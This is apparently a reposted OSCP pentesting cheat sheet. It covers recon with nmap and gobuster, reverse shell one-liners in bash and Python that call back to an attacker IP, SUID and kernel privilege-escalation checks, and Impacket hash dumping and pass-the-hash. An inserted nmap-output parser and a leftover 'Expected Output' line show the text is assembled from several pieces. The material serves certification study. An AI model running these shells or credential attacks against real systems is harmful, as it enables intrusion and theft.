OSCP Cheat Sheet: The Ultimate Pentesting Resource

If you’re preparing for the OSCP (Offensive Security Certified Professional) or refining your penetration testing skills, this comprehensive cheat sheet is a must-have. It covers essential tools, techniques, and methodologies used in real-world engagements, including:

  • Reconnaissance: nmap, ffuf, gobuster
  • Web Attacks: SQLi, RCE, XXE, JWT exploitation
  • Privilege Escalation: Potato exploits (Hot, Juicy, Rogue)
  • Post-Exploitation: BloodHound, Impacket tools
  • AV Evasion & Bypass Techniques

You Should Know:

Essential OSCP Commands & Techniques

1. Nmap Scans:

# Basic scan
nmap -sV -sC -oA scan_results <target_IP>

# Aggressive scan (OS detection)
nmap -A -T4 <target_IP>

# UDP scan (slower but crucial)
nmap -sU -p 53,161 <target_IP>
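The `-oA` flag above also writes a greppable `scan_results.gnmap` file. As an added example (not from the original post), the parser below turns that file into a per-host table of open ports, which is handy for the "document every step" part of the exam; the `.gnmap` text it reads is a constructed sample, not real scan data.

```python
"""Parse nmap greppable output (the .gnmap file written by `nmap -oA`)
into a per-host list of open ports for scan documentation."""
import re
from collections import defaultdict

# Constructed sample .gnmap content (not a real scan). Fields are tab-separated;
# each port entry is port/state/proto/owner/service/rpcinfo/version/
SAMPLE_GNMAP = (
    "# Nmap 7.94 scan initiated as: nmap -sV -sC -oA scan_results 10.10.10.0/24\n"
    "Host: 10.10.10.5 ()\tStatus: Up\n"
    "Host: 10.10.10.5 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.2p1 Ubuntu (protocol 2.0)/, "
    "80/open/tcp//http//Apache httpd 2.4.41 ((Ubuntu))/, 443/closed/tcp//https///"
    "\tIgnored State: closed (997)\n"
    "Host: 10.10.10.6 ()\tStatus: Up\n"
    "Host: 10.10.10.6 ()\tPorts: 445/open/tcp//microsoft-ds//Windows Server 2019 microsoft-ds/, "
    "3389/filtered/tcp//ms-wbt-server///\tIgnored State: filtered (998)\n"
    "# Nmap done -- 2 IP addresses (2 hosts up) scanned\n"
)

HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)")
# Split port entries on a comma only when the next entry (digits + '/') follows,
# so a comma inside a version string does not break the entry apart.
ENTRY_SPLIT_RE = re.compile(r",\s*(?=\d+/)")

def parse_gnmap(text):
    """Return {ip: [(port, proto, service, version), ...]} for open ports only."""
    hosts = defaultdict(list)
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue  # skip the '# Nmap ...' header and footer lines
        fields = line.split("\t")
        m = HOST_RE.match(fields[0])
        if m is None:
            continue
        ip = m.group(1)
        for field in fields[1:]:
            if not field.startswith("Ports:"):
                continue  # 'Status:' and 'Ignored State:' carry no port data
            for entry in ENTRY_SPLIT_RE.split(field[len("Ports:"):].strip()):
                parts = entry.strip().split("/")
                if len(parts) < 7:
                    continue  # malformed entry: leave it out rather than guess
                port, state, proto, service, version = parts[0], parts[1], parts[2], parts[4], parts[6]
                if state == "open":
                    hosts[ip].append((int(port), proto, service, version))
    return dict(hosts)

def report_table(hosts):
    """Render the parsed result as tab-separated rows ready to paste into notes."""
    rows = ["host\tport\tproto\tservice\tversion"]
    for ip in sorted(hosts):
        for port, proto, service, version in sorted(hosts[ip]):
            rows.append(f"{ip}\t{port}\t{proto}\t{service}\t{version}")
    return "\n".join(rows)

if __name__ == "__main__":
    print(report_table(parse_gnmap(SAMPLE_GNMAP)))
```

Replace `SAMPLE_GNMAP` with the contents of your own `scan_results.gnmap` to build the table for a real engagement.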

2. Web Enumeration with Gobuster:

# Directory brute-forcing
gobuster dir -u http://<target_IP> -w /usr/share/wordlists/dirb/common.txt

# Subdomain enumeration
gobuster dns -d example.com -w /usr/share/wordlists/subdomains-top1m.txt

3. Reverse Shells (Common Payloads):

# Bash reverse shell
bash -i >& /dev/tcp/<attacker_IP>/<port> 0>&1

# Python reverse shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker_IP>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

4. Privilege Escalation (Linux):

# Check SUID binaries
find / -perm -4000 2>/dev/null

# Kernel exploits
uname -a  # Check kernel version
searchsploit <kernel_version>

5. Post-Exploitation with Impacket:

# Dumping hashes
impacket-secretsdump DOMAIN/user:password@<target_IP>

# Pass-the-hash attack
impacket-psexec -hashes <LM:NTLM_hash> DOMAIN/user@<target_IP>

What Undercode Say:

The OSCP exam demands hands-on expertise—memorizing commands isn’t enough. Practice in HTB (Hack The Box) or TryHackMe labs. Focus on:
– Manual exploitation (Metasploit is restricted).
– Documentation (report every step).
– Time management (24-hour exam).

Expected Output:

A structured cheat sheet with real-world attack chains, bypass techniques, and exam-compliant methods to maximize efficiency during engagements.

Reported By: Dharamveer Prasad – Hackers Feeds